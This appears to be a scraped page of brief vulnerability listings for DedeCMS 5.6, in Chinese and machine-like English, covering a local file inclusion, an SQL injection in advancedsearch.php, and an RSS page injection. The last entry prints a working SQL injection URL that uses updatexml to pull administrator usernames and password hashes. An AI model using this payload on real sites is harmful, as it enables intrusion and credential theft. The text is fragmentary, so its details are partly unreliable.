DedeCms 5.6 /plus/carbuyaction.php 本地文件包含漏洞

No description provided by source...

DedeCMS v5.6 /plus/advancedsearch.php SQL注入漏洞

DedeCMS是国内一款非常流行的网站内容管理系统，其v5.6版本在/plus/advancedsearch.php文件中只要line 36中的$mid不为0，然后能在line 43中检索出自定义模型，便可继续下面的逻辑，因为line 54 变量$sql未初始化，所以利用dede注册变量的逻辑，可以控制$sql的值，所以$sql会被带入数据裤中查询。 DedeCMS 5.6...

dedecms 5.6 RSS subscription page injection vulnerability-vulnerability warning-the black bar safety net

EXP: the uploads/plus/rss. php? tid=1&Cs1=1&Cs2%2 9% 2 9%20AND%2 0% 2 2% 2 7% 2 2%20AND%20updatexml%2 8 1,%28SELECT%20CONCAT%280x5b,uname,0x3a,MID%28pwd,4,1 6% 2 9,0x5d%2 9%20FROM%20dedeadmin%29,1%2 9%2 3%2 70=1 The use of the environment: GPC off There updatexml function...